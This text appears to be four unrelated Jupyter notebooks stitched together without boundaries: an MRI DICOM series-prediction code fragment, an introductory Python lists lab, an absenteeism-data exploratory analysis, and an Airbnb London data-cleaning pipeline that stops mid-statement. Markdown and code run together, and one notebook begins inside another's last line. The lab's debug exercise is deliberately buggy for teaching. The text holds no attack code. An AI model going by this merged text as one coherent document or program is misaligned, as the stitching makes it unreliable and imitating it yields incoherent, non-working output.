'opt_E', 'opt_EDR_GEMS', 'opt_EPI_GEMS', 'opt_F', 'opt_FAST_GEMS', 'opt_FC', 'opt_FC_FREQ_AX_GEMS', 'opt_FC_SLICE_AX_GEMS', 'opt_FILTERED_GEMS', 'opt_FR_GEMS', 'opt_FS', 'opt_FSA_GEMS', 'opt_FSI_GEMS', 'opt_FSL_GEMS', 'opt_FSP_GEMS', 'opt_FSS_GEMS', 'opt_G', 'opt_I', 'opt_IFLOW_GEMS', 'opt_IR', 'opt_IR_GEMS', 'opt_L', 'opt_M', 'opt_MP_GEMS', 'opt_MT', 'opt_MT_GEMS', 'opt_NPW', 'opt_P', 'opt_PFF', 'opt_PFP', 'opt_PROP_GEMS', 'opt_R', 'opt_RAMP_IS_GEMS', 'opt_S', 'opt_SAT1', 'opt_SAT2', 'opt_SAT_GEMS', 'opt_SEQ_GEMS', 'opt_SP', 'opt_T', 'opt_T2FLAIR_GEMS', 'opt_TRF_GEMS', 'opt_VASCTOF_GEMS', 'opt_VB_GEMS', 'opt_W', 'opt_X', 'opt__'] #export def _get_preds(clf, df, features, y_names=_y_names): y_pred = clf.predict(df[features]) y_prob = clf.predict_proba(df[features]) preds = pd.Series(y_names.take(y_pred)) probas = pd.Series([y_prob[i][pred] for i, pred in enumerate(y_pred)]) return pd.DataFrame({'seq_pred': preds, 'pred_proba': 
probas}) #export def predict_from_df(df, features=_features, thresh=0.8, model_path=_model_path, clf=None): "Predict series from `df[features]` at confidence threshold `p >= thresh`" if 'plane' not in df.columns: df1 = preprocess(df) labels = extract_labels(df1) df1 = df1.join(labels[['plane', 'contrast', 'seq_label']]) else: df1 = df.copy() if not clf: clf = load(model_path) df1 = df1.join(_get_preds(clf, df1, features)) filt = df1['pred_proba'] < thresh df1['seq_pred'][filt] = 'unknown' return df1 #export def predict_from_folder(path, **kwargs): "Read DICOMs into a `pandas.DataFrame` from `path` then predict series" _, df = get_dicoms(path) return predict_from_df(df, **kwargs)In-Class Coding Lab: ListsThe goals of this lab are to help you understand: - List indexing and slicing - List methods such as insert, append, find, delete - How to iterate over lists with loops Python Lists work like Real-Life Lists In real life, we make lists all the time. To-Do lists. Shopping lists. Reading lists. These lists are collections of items, for example here's my shopping list: ``` Milk, Eggs, Bread, Beer ```There are 4 items in this list.Likewise, we can make a similar list in Python, and count the number of items in the list using the `len()` function:shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] item_count = len(shopping_list) print("List: %s has %d items" % (shopping_list, item_count))Enumerating the Items in a ListIn real-life, we *enumerate* lists all the time. We go through the items on our list one at a time and make a decision, for example: "Did I add that to my shopping cart yet?"In Python we go through items in our lists with the `for` loop. We use `for` because the number of items is pre-determined and thus a **definite** loop is the appropriate choice. Here's an example:for item in shopping_list: print("I need to buy some %s " % (item)) # or with f-strings for item in shopping_list: print(f"I need to buy some {item}")1.1 You CodeWrite code in the space below to print each stock on its own line. Use a `for` loop and an f-string to print `You own ` before the name of the stock|stocks = [ 'IBM', 'AAPL', 'GOOG', 'MSFT', 'TWTR', 'FB'] #TODO: Write code hereIndexing ListsSometimes we refer to our items by their place in the list. For example "Milk is the first item on the list" or "Beer is the last item on the list."We can also do this in Python, and it is called *indexing* the list. It works the same as a **string slice.****IMPORTANT** The first item in a Python lists starts at index **0**.print("The first item in the list is:", shopping_list[0]) print("The last item in the list is:", shopping_list[3]) print("This is also the last item in the list:", shopping_list[-1]) print("This is the second to last item in the list:", shopping_list[-2])For Loop with IndexYou can also loop through your Python list using an index. In this case we use the `range()` function to determine how many times we should loop, then index the item in the list using the iterator variable from the `for` loop.for i in range(len(shopping_list)): print("I need to buy some %s " % (shopping_list[i]))1.2 You CodeWrite code to print the 2nd and 4th stocks in the list variable `stocks`. Print them on the same line: For example:`AAPL MSFT`stocks = [ 'IBM', 'AAPL', 'GOOG', 'MSFT', 'TWTR', 'FB'] #TODO: Write code hereLists are MutableUnlike strings, lists are **mutable**. This means we can change a value in the list.For example, I want `'Craft Beer'` not just `'Beer'`. 
I need `Organic Eggs` not `Eggs`.shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] print(f"Before: {shopping_list}") shopping_list[-1] = 'Craft Beer' shopping_list[1] = 'Organic Eggs' print(f"After {shopping_list}")List MethodsIn your readings and class lecture, you encountered some list methods. These allow us to maniupulate the list by adding or removing items.def print_shopping_list(mylist): print(f"My shopping list: {mylist}") shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] print_shopping_list(shopping_list) print("Adding 'Cheese' to the end of the list...") shopping_list.append('Cheese') #add to end of list print_shopping_list(shopping_list) print("Adding 'Cereal' to position 0 in the list...") shopping_list.insert(0,'Cereal') # add to the beginning of the list (position 0) print_shopping_list(shopping_list) print("Removing 'Cheese' from the list...") shopping_list.remove('Cheese') # remove 'Cheese' from the list print_shopping_list(shopping_list) print("Removing item from position 0 in the list...") del shopping_list[0] # remove item at position 0 print_shopping_list(shopping_list)1.3 You Code: DebugDebug this program which allows you to manage a list of stocks. This program will loop indefinately. When you enter:- `A` it will ask you for a stock Symbol to add to the beginning of the list, then print the list.- `R` it will ask you for a stock Symbol to remove from the list, then print the list.- `Q` it will quit the program.Example Run: Enter Command: A, R, Q ?a Enter symbol to ADD: appl Your Stocks ['APPL'] Enter Command: A, R, Q ?a Enter symbol to ADD: msft Your Stocks ['MSFT', 'APPL'] Enter Command: A, R, Q ?a Enter symbol to ADD: amzn Your Stocks ['AMZN', 'MSFT', 'APPL'] Enter Command: A, R, Q ?r Enter symbol to REMOVE: msft Your Stocks ['AMZN', 'APPL'] Enter Command: A, R, Q ?q# TODO: debug this code stocks = [] while false: choice = input("Enter Command: A, R, Q ?").upper() if choice == 'Q': break elif choice == 'A': stock = input("Enter symbol to ADD: ").upper() stocks.insert(stock,0) print(f"Your Stocks stocks") elif choice == 'R': stock = input("Enter symbol to REMOVE: ").upper() stoscks.delete(stock) print("Your Stocks {stocks}") else: print("Invalid Command!")SortingSince Lists are mutable. You can use the `sort()` method to re-arrange the items in the list alphabetically (or numerically if it's a list of numbers)shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] print("Before Sort:", shopping_list) shopping_list.sort() print("After Sort:", shopping_list)The Magic behind `S.split()` and `S.join(list)`Now that we know about lists, we can revisit some of the more confusing string methods like `S.split()` and `S.join(list)``S.split()` takes a string `S` and splits the string into a `list` of values. The split is based on the argument. For example, this splits a string `sentence` into a list `words`, splitting on whitespace.sentence = "I like cheese" words = sentence.split() print(f"words is a {type(words)} values: {words}")To demonstrate it's really a list, let's add a word to the list and then regenerate the sentence with the `S.join(list)` method. 
`S.join(list)` does the opposite of `split()` joins the `list` back together delimiting each item in the list with `S`.For example: `"-".join([1,2,3])` outputs: `1-2-3`Here we add `'swiss` to the list of `words` before `join()`ing back into a string `i like swiss cheese`.words.insert(2,'swiss') print(words) new_sentence = " ".join(words) print(f"Joined back into a sentence: {new_sentence}")The Magic behind `file.readlines()`With an understanding of lists, we can now better understand how `file.readlines()` actually works. The `file.readlines()` function reads in the entire contents of the file, spliting it into a list of lines. Each item in the list is a line in the file.with open('shopping_list.txt','r') as f: lines = f.readlines() print(f"This is a list: {lines}")List ComprehensionsIf you look at the output of the previous example, you see the newline character `\n` at the end of some items in the list. To remove this, we could write a `for` loop to `strip()` the newline and the add it to another list. This is so, common Python has a shortcut way to do it, called a **list comprehension**.The list comprehension applies a function to each item in the list. It looks like this:`new_list = [ function for item in current_list ]`For example, to strip the newline:print(f"Unstripped: {lines}") # List comprehension stripped_lines = [ line.strip() for line in lines ] print(f"Stripped: {stripped_lines}")In the above example:- The current list is `lines` - The new list is `stripped_lines` and - The function we apply is `strip()` to each `line` in the list of `lines`.List comprehension are handy when we need to parse and tokenize. With Python, we can do this in 2 lines of code.When you run this example, input exactly this: `1, 3.4, 5 ,-4` And marvel how it gets converted into a list of acutal numbers!raw_input = input("Enter a comma-separated list of numbers: ") raw_list = raw_input.split(',') number_list = [ float(number) for number in raw_list ] print(f"Raw Input: {raw_input}") print(f"Tokenized Input {raw_list}") print(f"Parsed to Numbers: {number_list}")Putting it all togetherWinning Lotto numbers. When the lotto numbers are drawn, they are in *any* order, when they are presented they're always sorted lowest to highest. Let's write a program to input numbers, separated by a `,` then storing each to a list, coverting that list to a list of numbers, and then sorting/printing it.ALGORITHM:```1. input a comma-separated string of numbers2. split the string into a list3. parse the list of strings into a list of numbers4. sort the list of numbers4. print the sorted list of numbers like this: 'today's winning numbers are [1, 5, 17, 34, 56]'```Sample Code Run: Enter lotto number drawing: 45, 13, 56, 8, 2 Winning numbers are: [2, 8, 13, 45, 56] 1.4 You Code## TODO: Write program here:Metacognition Rate your comfort level with this week's material so far. **1** ==> I don't understand this at all yet and need extra help. If you choose this please try to articulate that which you do not understand to the best of your ability in the questions and comments section below. **2** ==> I can do this with help or guidance from other people or resources. If you choose this level, please indicate HOW this person helped you in the questions and comments section below. **3** ==> I can do this on my own without any help. 
**4** ==> I can do this on my own and can explain/teach how to do it to others.`--== Double-Click Here then Enter a Number 1 through 4 Below This Line ==--` Questions And Comments Record any questions or comments you have about this lab that you would like to discuss in your recitation. It is expected you will have questions if you did not complete the code sections correctly. Learning how to articulate what you do not understand is an important skill of critical thinking. Write them down here so that you remember to ask them in your recitation. We expect you will take responsilbity for your learning and ask questions in class.`--== Double-click Here then Enter Your Questions Below this Line ==--`# run this code to turn in your work! from coursetools.submission import Submission Submission().submit()EXPLORATORY DATA ANALYSIS Using Absenteeism at work An UCI dataset Load the training datasetfrom google.colab import drive drive.mount('/content/drive')Mounted at /content/driveImport Libraryimport pandas as pd import seaborn as sns import matplotlib.pyplot as pltImport Datasetdata_cat = pd.read_csv('/content/drive/MyDrive/Colab Notebooks/ABSENTEEISM AT WORK DATASET/Source Code/cleanDataset_categoricalTarget.csv') data_con = pd.read_csv('/content/drive/MyDrive/Colab Notebooks/ABSENTEEISM AT WORK DATASET/Source Code/cleanDataset_continuousTarget.csv')Effect of Age on Absenteeism time in various seasons. Continouus variables# line graph for mean of Absenteeism in hours in different months plt.figure(figsize=(10,5)) mean_abs_per_month = data_con.groupby(['Month of absence','followUp_req'],as_index = False).agg({'Absenteeism time in hours': "mean"}) # print(mean_abs_per_month) sns.lineplot('Month of absence','Absenteeism time in hours',hue = 'followUp_req',style = 'followUp_req',data = mean_abs_per_month) plt.legend(['NoFollowup','Followup']) plt.title("Mean absentism in different months")/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variables as keyword args: x, y. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarningProbability density plot for Service Time, Work load Average/Day, Hit target and Son Categorical variablesdataset_categorical = data_cat plt.figure(2) plt.subplot(121) sns.countplot(dataset_categorical['Disciplinary failure']) plt.subplot(122) sns.countplot(dataset_categorical['Education'])/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarning /usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. 
FutureWarningAggregate of total absent hours for Disciplinary failuredataset_continuous = data_con hit = dataset_continuous.groupby('Hit target')[['Absenteeism time in hours']].mean() ax = hit.plot(kind='bar', figsize=(7,4), legend=True) ax.set_xlabel('hit target') ax.set_ylabel('Absenteeism time in hours') ax.set_title('Average Absenteeism time in hours by hit target') plt.show() data_ser = dataset_continuous.groupby('Service time')[['Absenteeism time in hours']].mean() ax = data_ser.plot(kind='bar', figsize=(7,4), legend=True) ax.set_xlabel('Service time') ax.set_ylabel('Absenteeism time in hours') ax.set_title('Average Absenteeism time in hours by Service time') plt.show()Airbnb Analysis London. Illustrative Guide to modeling variable importance with Airbnb pricing data. Preporocessing the raw data**The Purpose of this notebook is to construct a repetative data preprocessing pipeline. This notebook can be used to run any city from the Airbnb data set and produce the same/similar (some features may not be relavant for certain locations, e.g. zipcode is not relevant to London) data output for modeling pricing.**The data used for this illustrative analysis is downloaded from [Insideairbnb.com](https://insideairbnb.com/).According to the source, Inside Airbnb is an independent, non-commercial set of data that allows you to explore how Airbnb is being used in various cities around the world.By analyzing publicly available information about a city's Airbnb's listings, Inside Airbnb provides filters and key metrics where we can see how Airbnb is being used to compete with the residential housing market.With Inside Airbnb, you can ask fundamental questions about Airbnb in any neighborhood, or across the city as a whole. Questions such as:- How many listings are in a neighborhood and where are they?- What are global (city wide) or local (all the way down to a single unit) historical Airbnb trends - How many houses and apartments are being rented out frequently to tourists and not to long-term residents?- How much are hosts making from renting to tourists (compare that to long-term rentals)- "Which hosts are running a business with multiple listings and where they?- etc..While the data is a rich resource, there are some limitation to using the data. Like nearly evey real dataset, the data quality is fairly poor and requires preprocessing and feature engineering. To utilize as much of the data as we can we will use imputation techniques to fill missing values. There are many features in this dataset but many of them are incomplete and either need be refined using imputation or dropped from the analysis. This data is similar to our rental data in that the data only consists of advertised price. The advertised prices can be set to any arbitrary amount by the host, and hosts that are less experienced with Airbnb will often set these to very low or very high amounts. This dataset is naive to the actual amount paid on a per night basis. Even with the described limitation, I believe this data to be informative of the Airbnb dynamics of a city. 
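As a preview of the imputation approach applied in the preprocessing steps below, numeric gaps are mostly filled with the column median and missing categoricals are labelled as an explicit 'unknown' level. A minimal sketch of that idea on a toy frame (the toy data itself is illustrative; the two column names mirror listing fields cleaned later on):

```python
import numpy as np
import pandas as pd

# Toy stand-in for the listings table, not the real data
toy = pd.DataFrame({
    'bedrooms': [1.0, np.nan, 3.0],
    'host_response_time': ['within an hour', None, 'within a day'],
})

# Numeric gap -> column median; categorical gap -> explicit 'unknown' level
toy['bedrooms'] = toy['bedrooms'].fillna(toy['bedrooms'].median())
toy['host_response_time'] = toy['host_response_time'].fillna('unknown')
print(toy)
```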
​ Getting Setup Install additional environmental requirements.- Colab comes preconfigured with the majority of the dependencies needed for this lab, but we need to add a few for exploratory data analysis.# # Important library for many geopython libraries # !apt install gdal-bin python-gdal python3-gdal tree # # Install rtree - Geopandas requirment # !apt install python3-rtree # # Install Geopandas # !pip install git+git://github.com/geopandas/geopandas.git # # Install descartes - Geopandas requirment # !pip install descartes # # Install Folium for Geographic data visualization # !pip install folium # # Install plotlyExpress # !pip install plotly_express # !pip install quilt # !quilt install ResidentMario/missingno_dataMount Google Drive- For any city we will need two files. - listings.csv.gz - neighbourhoods.geojsonI have downloaded these files to Google Drive. In this next step we will need to mount My Drive to our linux virtual machine.from google.colab import drive drive.mount('/content/drive')Drive already mounted at /content/drive; to attempt to forcibly remount, call drive.mount("/content/drive", force_remount=True).Load python libraries# Importing required libraries import pandas as pd import numpy as np import missingno as msno from IPython.core.display import HTML from datetime import datetime import seaborn as sns import geopandas as gpd import time from IPython.display import SVG import matplotlib.pyplot as plt plt.style.use('dark_background') plt.rcParams.update({ "lines.color": "white", "patch.edgecolor": "white", "text.color": "white", "axes.facecolor": "#383838", "axes.edgecolor": "lightgray", "axes.labelcolor": "white", "xtick.color": "white", "ytick.color": "white", "grid.color": "lightgray", "figure.facecolor": "#383838", "figure.edgecolor": "#383838", }) %matplotlib inlineLoad Data:- You can choose anyway you want to get the data into the environment. From here on the notebook should handle everything the same.raw_df = pd.read_csv('/content/drive/My Drive/data/london.csv',low_memory=False) pd.set_option('display.max_rows', 50) #set the number of visible rows pd.set_option('display.max_columns', 110) #set the number of visible columns HTML("
Our data has {0} rows and {1} columns. Let's check our data completeness.
".format(raw_df.shape[0],raw_df.shape[1])) raw_df.info(verbose=True,null_counts=True) RangeIndex: 85068 entries, 0 to 85067 Data columns (total 106 columns): id 85068 non-null int64 listing_url 85068 non-null object scrape_id 85068 non-null int64 last_scraped 85068 non-null object name 85043 non-null object summary 80736 non-null object space 59218 non-null object description 82683 non-null object experiences_offered 85068 non-null object neighborhood_overview 54694 non-null object notes 32799 non-null object transit 54320 non-null object access 4574[...]Processing Data: Visualizing missing data across our features.- Missing Data by Columns, filter to less than 50 to see column names.raw_df = raw_df.replace("nan", np.nan) msno.matrix(raw_df.iloc[:,:raw_df.shape[1]].sample(raw_df.shape[0]),fontsize=9,color=(.3, .84, .77),sort='ascending'); print("Missing Data by Columns, filter to less than 50 to see column names")Missing Data by Columns, filter to less than 50 to see column namesCopy And Drop Unecessary Data:- Becuase this is an illustrative example we will not be running any Natural Language Processing techniques on the free form text features. However we might be able to enhace our feature set by generating more data from these text features later on if we need to.cols_to_drop = ['listing_url', 'scrape_id', 'last_scraped', 'name', 'summary', 'space', 'description', 'neighborhood_overview', 'notes', 'transit', 'access', 'interaction', 'house_rules', 'thumbnail_url', 'medium_url', 'picture_url', 'xl_picture_url', 'host_id', 'host_url', 'host_name', 'host_location', 'host_about', 'host_thumbnail_url', 'host_picture_url', 'host_neighbourhood', 'host_verifications', 'calendar_last_scraped'] df = raw_df.drop(cols_to_drop, axis=1).set_index('id',drop=True) #make a copy of our raw data- There are multiple columns for property location, including an attempt by the site that originally scraped the data to clean up the neighbourhood locations. Some of these columns can be dropped. 
Because all of the listings are in London, columns relating to city and country can be dropped.- Because we are looking at a specific city in the same country we can drop redundant location data.# lat_long = df[['latitude', 'longitude']] df.drop(['street', 'neighbourhood', 'city', 'market', 'smart_location', 'country_code', 'country', 'is_location_exact'], axis=1, inplace=True)- Visualizing columns with nullsdf.isna().sum()[df.isna().sum()>100].sort_values().plot(kind='barh',figsize=(12,8),color=(.3, .84, .77)) missing_val_columns_to_drop = list(df.isna().sum()[df.isna().sum()>1000].index) missing_val_columns_to_drop.remove('host_response_time') #added back missing_val_columns_to_drop.remove('host_response_rate') #added back missing_val_columns_to_drop.remove('cleaning_fee') #added back missing_val_columns_to_drop.remove('security_deposit') #added back missing_val_columns_to_drop.remove('first_review') #added back missing_val_columns_to_drop.remove('review_scores_rating') #added back missing_val_columns_to_drop.remove('review_scores_accuracy') #added back missing_val_columns_to_drop.remove('review_scores_cleanliness') #added back missing_val_columns_to_drop.remove('review_scores_value') #added back missing_val_columns_to_drop.remove('last_review') #added back print("columns to drop",pd.DataFrame(missing_val_columns_to_drop)) df.drop(missing_val_columns_to_drop, axis=1, inplace=True)Drop repetative columns:print( "Number of mismatches : ",str(sum((df.host_listings_count == df.host_total_listings_count) == False))) df.drop(['host_total_listings_count', 'calculated_host_listings_count', 'calculated_host_listings_count_entire_homes', 'calculated_host_listings_count_private_rooms', 'calculated_host_listings_count_shared_rooms'], axis=1, inplace=True) # df[["host_listings_count","host_total_listings_count"]] # df.loc[((df.host_listings_count == df.host_total_listings_count) == False)][:5] print(df.shape)Number of mismatches : 12 (85068, 52)There are multiple columns for minimum and maximum night stays, but the two main ones will be used as there are few differences between e.g. minimum_nights and minimum_minimum_nights. The latter presumably refers to the fact that min/max night stays can vary over the year. The default (i.e. 
most frequently applied) min/max night stay values will be used instead.df.drop(['minimum_minimum_nights', 'maximum_minimum_nights', 'minimum_maximum_nights', 'maximum_maximum_nights', 'minimum_nights_avg_ntm', 'maximum_nights_avg_ntm'], axis=1, inplace=True) print(df.shape) # Replacing columns with f/t with 0/1 df.replace({'f': 0, 't': 1}, inplace=True) # Plotting the distribution of numerical and boolean categories df.hist(figsize=(20,20),color=(.3, .84, .77), edgecolor='k', linewidth=0.3);to doWe will drop anything that doesn't have adequate classesdf.drop(['has_availability', 'host_has_profile_pic', 'is_business_travel_ready', 'require_guest_phone_verification', 'require_guest_profile_picture', 'requires_license'], axis=1, inplace=True) # df.dropna(subset=['host_since'], inplace=True) # df.drop('bed_type', axis=1, inplace=True) df.drop('calendar_updated', axis=1, inplace=True) print(df.experiences_offered.value_counts()) df.drop('experiences_offered', axis=1, inplace=True)none 83388 business 582 family 479 social 411 romantic 208 Name: experiences_offered, dtype: int64Cleaning Data Columns:# Converting to datetime df.host_since = pd.to_datetime(df.host_since) # Calculating the number of days df['host_days_active'] = (datetime.now() - df.host_since).astype('timedelta64[D]') # Printing mean and median print("Mean days as host:", round(df['host_days_active'].mean(),0)) print("Median days as host:", df['host_days_active'].median()) # Replacing null values with the median df.host_days_active.fillna(df.host_days_active.median(), inplace=True) print("Null values:", df.host_response_time.isna().sum()) print(f"Proportion: {round((df.host_response_time.isna().sum()/len(df))*100, 1)}%") # # Number of rows without a value for host_response_time which have also not yet had a review len(df[df[['host_response_time', 'first_review']].isnull().sum(axis=1) == 2]) df.host_response_time.fillna("unknown", inplace=True) print("-- -- --") df.host_response_time.value_counts(normalize=True).plot(kind='barh') # Removing the % sign from the host_response_rate string and converting to an integer df.host_response_rate = df.host_response_rate.str[:-1].astype('float64') # Bin into four categories df.host_response_rate = pd.cut(df.host_response_rate, bins=[0, 50, 90, 99, 100], labels=['0-49%', '50-89%', '90-99%', '100%'], include_lowest=True) # Converting to string df.host_response_rate = df.host_response_rate.astype('str') # Replace nulls with 'unknown' df.host_response_rate.replace('nan', 'unknown', inplace=True) # Category counts df.host_response_rate.value_counts()Property Typedf.property_type.value_counts() # Replacing categories that are types of houses or apartments df.property_type.replace({ 'Townhouse': 'House', 'Serviced apartment': 'Apartment', 'Loft': 'Apartment', 'Bungalow': 'House', 'Cottage': 'House', 'Villa': 'House', 'Chalet': 'House' }, inplace=True) # 'Tiny house': 'House', # 'Earth house': 'House', # Replacing other categories with 'other' df.loc[~df.property_type.isin(['House', 'Apartment']), 'property_type'] = 'Other' for col in ['bathrooms', 'bedrooms', 'beds']: df[col].fillna(df[col].median(), inplace=True)Amenities# Creating a set of all possible amenities amenities_list = list(df.amenities) amenities_list_string = " ".join(amenities_list) amenities_list_string = amenities_list_string.replace('{', '') amenities_list_string = amenities_list_string.replace('}', ',') amenities_list_string = amenities_list_string.replace('"', '') amenities_set = [x.strip() for x in 
amenities_list_string.split(',')] amenities_set = set(amenities_set) amenities_setIn the list above, some amenities are more important than others (e.g. a balcony is more likely to increase price than a fax machine), and some are likely to be fairly uncommon (e.g. 'Electric profiling bed'). Based on previous experience working in the Airbnb property management industry, and research into which amenities are considered by guests to be more important, a selection of the more important amenities will be extracted. These will be further investigated in the EDA section. For example, if it turns out that almost all properties have/do not have a particular amenity, that feature will not be very useful in helping explain differences in prices.The amenities chosen are (slashes indicate separate categories that can be combined):- 24-hour check-in- Air conditioning/central air conditioning- Amazon Echo/Apple TV/DVD player/game console/Netflix/projector and screen/smart TV (i.e. non-basic electronics)- BBQ grill/fire pit/propane barbeque- Balcony/patio or balcony- Beach view/beachfront/lake access/mountain view/ski-in ski-out/waterfront (i.e. great location/views)- Bed linens- Breakfast- Cable TV/TV- Coffee maker/espresso machine- Cooking basics- Dishwasher/Dryer/Washer/Washer and dryer- Elevator- Exercise equipment/gym/private gym/shared gym- Family/kid friendly, or anything containing 'children'- Free parking on premises/free street parking/outdoor parking/paid parking off premises/paid parking on premises- Garden or backyard/outdoor seating/sun loungers/terrace- Host greets you- Hot tub/jetted tub/private hot tub/sauna/shared hot tub/pool/private pool/shared pool- Internet/pocket wifi/wifi- Long term stays allowed- Pets allowed/cat(s)/dog(s)/pets live on this property/other pet(s)- Private entrance- Safe/security system- Self check-in- Smoking allowed- Step-free access/wheelchair accessible, or anything containing 'accessible'- Suitable for eventsdf.loc[df['amenities'].str.contains('24-hour check-in'), 'check_in_24h'] = 1 df.loc[df['amenities'].str.contains('Air conditioning|Central air conditioning'), 'air_conditioning'] = 1 df.loc[df['amenities'].str.contains('Amazon Echo|Apple TV|Game console|Netflix|Projector and screen|Smart TV'), 'high_end_electronics'] = 1 df.loc[df['amenities'].str.contains('BBQ grill|Fire pit|Propane barbeque'), 'bbq'] = 1 df.loc[df['amenities'].str.contains('Balcony|Patio'), 'balcony'] = 1 df.loc[df['amenities'].str.contains('Beach view|Beachfront|Lake access|Mountain view|Ski-in/Ski-out|Waterfront'), 'nature_and_views'] = 1 df.loc[df['amenities'].str.contains('Bed linens'), 'bed_linen'] = 1 df.loc[df['amenities'].str.contains('Breakfast'), 'breakfast'] = 1 df.loc[df['amenities'].str.contains('TV'), 'tv'] = 1 df.loc[df['amenities'].str.contains('Coffee maker|Espresso machine'), 'coffee_machine'] = 1 df.loc[df['amenities'].str.contains('Cooking basics'), 'cooking_basics'] = 1 df.loc[df['amenities'].str.contains('Dishwasher|Dryer|Washer'), 'white_goods'] = 1 df.loc[df['amenities'].str.contains('Elevator'), 'elevator'] = 1 df.loc[df['amenities'].str.contains('Exercise equipment|Gym|gym'), 'gym'] = 1 df.loc[df['amenities'].str.contains('Family/kid friendly|Children|children'), 'child_friendly'] = 1 df.loc[df['amenities'].str.contains('parking'), 'parking'] = 1 df.loc[df['amenities'].str.contains('Garden|Outdoor|Sun loungers|Terrace'), 'outdoor_space'] = 1 df.loc[df['amenities'].str.contains('Host greets you'), 'host_greeting'] = 1 df.loc[df['amenities'].str.contains('Hot 
tub|Jetted tub|hot tub|Sauna|Pool|pool'), 'hot_tub_sauna_or_pool'] = 1 df.loc[df['amenities'].str.contains('Internet|Pocket wifi|Wifi'), 'internet'] = 1 df.loc[df['amenities'].str.contains('Long term stays allowed'), 'long_term_stays'] = 1 df.loc[df['amenities'].str.contains('Pets|pet|Cat(s)|Dog(s)'), 'pets_allowed'] = 1 df.loc[df['amenities'].str.contains('Private entrance'), 'private_entrance'] = 1 df.loc[df['amenities'].str.contains('Safe|Security system'), 'secure'] = 1 df.loc[df['amenities'].str.contains('Self check-in'), 'self_check_in'] = 1 df.loc[df['amenities'].str.contains('Smoking allowed'), 'smoking_allowed'] = 1 df.loc[df['amenities'].str.contains('Step-free access|Wheelchair|Accessible'), 'accessible'] = 1 df.loc[df['amenities'].str.contains('Suitable for events'), 'event_suitable'] = 1 # Replacing nulls with zeros for new columns # Produces a list of amenity features where one category (true or false) contains fewer than 10% of listings infrequent_amenities = [] for col in df.iloc[:,41:].columns: if df[col].sum() < len(df)/10: infrequent_amenities.append(col) print(infrequent_amenities) # Dropping infrequent amenity features df.drop(infrequent_amenities, axis=1, inplace=True) # Dropping the original amenity feature df.drop('amenities', axis=1, inplace=True)['high_end_electronics', 'bbq', 'nature_and_views', 'gym', 'hot_tub_sauna_or_pool', 'secure', 'smoking_allowed', 'accessible', 'event_suitable']Priceplt.figure(figsize=(14,4)) plt.yscale('log') try: df.price = df.price.str[1:-3] df.price = df.price.str.replace(",", "") df.price = df.price.astype('int64') print(sns.distplot(df.price.values,bins=1000,color='yellow', kde=False)); except: print(sns.distplot(df.price.values,bins=1000,color='yellow', kde=False)); pass df.drop(df[df.price > 1000].index, inplace=True)Security Depositdf.security_deposit = df.security_deposit.str[1:-3] df.security_deposit = df.security_deposit.str.replace(",", "") df.security_deposit.fillna(0, inplace=True) df.security_deposit = df.security_deposit.astype('int64') plt.figure(figsize=(14,4)) plt.yscale('log') print(sns.distplot(df.security_deposit.values,bins=1000,color='red', kde=False));AxesSubplot(0.125,0.125;0.775x0.755)Cleaning Feedf.cleaning_fee = df.cleaning_fee.str[1:-3] df.cleaning_fee = df.cleaning_fee.str.replace(",", "") df.cleaning_fee.fillna(0, inplace=True) df.cleaning_fee = df.cleaning_fee.astype('int64')Extra Peopledf.extra_people = df.extra_people.str[1:-3] df.extra_people = df.extra_people.str.replace(",", "") df.extra_people.fillna(0, inplace=True) df.extra_people = df.extra_people.astype('int64')First Reviewdf.first_review = pd.to_datetime(df.first_review) # Converting to datetime # Calculating the number of days between the first review and the date the data was scraped df['time_since_first_review'] = (datetime.now() - df.first_review).astype('timedelta64[D]') df[df['first_review'].isnull()==True][['time_since_first_review']].shape def bin_column(col, bins, labels, na_label='unknown'): """ Takes in a column name, bin cut points and labels, replaces the original column with a binned version, and replaces nulls (with 'unknown' if unspecified). 
""" df[col] = pd.cut(df[col], bins=bins, labels=labels, include_lowest=True) df[col] = df[col].astype('str') df[col].fillna(na_label, inplace=True) # Binning time since first review bin_column('time_since_first_review', bins=[0, 182, 365, 730, 1460, max(df.time_since_first_review)], labels=['0-6 months', '6-12 months', '1-2 years', '2-3 years', '4+ years'], na_label='no reviews') # Distribution of the number of days since first review df.time_since_first_review.hist(figsize=(15,5), bins=30, color=(.3, .84, .77), edgecolor='k'); df.drop('first_review', axis=1, inplace=True) df.drop(['time_since_first_review'], axis=1, inplace=True)Last Reviewdf.last_review = pd.to_datetime(df.last_review) # Converting to datetime # Calculating the number of days between the most recent review and the date the data was scraped df['time_since_last_review'] = (datetime.now() - df.last_review).astype('timedelta64[D]') # Distribution of the number of days since last review df.time_since_last_review.hist(figsize=(15,5), bins=30,color=(.3, .84, .77),edgecolor='k'); # Binning time since last review bin_column('time_since_last_review', bins=[0, 14, 60, 182, 365, max(df.time_since_last_review)], labels=['0-2 weeks', '2-8 weeks', '2-6 months', '6-12 months', '1+ year'], na_label='no reviews') # Distribution of the number of days since first review df.time_since_last_review.hist(figsize=(15,5), bins=30, color=(.3, .84, .77),edgecolor='k'); # Dropping last_review - first_review will be kept for EDA and dropped later df.drop('last_review', axis=1, inplace=True) df.drop(['time_since_last_review'], axis=1, inplace=True)Review Ratings# Checking the distributions of the review ratings columns variables_to_plot = list(df.columns[df.columns.str.startswith("review_scores") == True]) fig = plt.figure(figsize=(12,8)) for i, var_name in enumerate(variables_to_plot): ax = fig.add_subplot(3,3,i+1) df[var_name].hist(bins=10,ax=ax,color=(.3, .84, .77)) ax.set_title(var_name) fig.tight_layout() plt.show() # Creating a list of all review columns that are scored out of 10 variables_to_plot.pop(0) # Binning for all columns scored out of 10 for col in variables_to_plot: bin_column(col, bins=[0, 8, 9, 10], labels=['0-8/10', '9/10', '10/10'], na_label='no reviews') # Binning column scored out of 100 bin_column('review_scores_rating', bins=[0, 80, 95, 100], 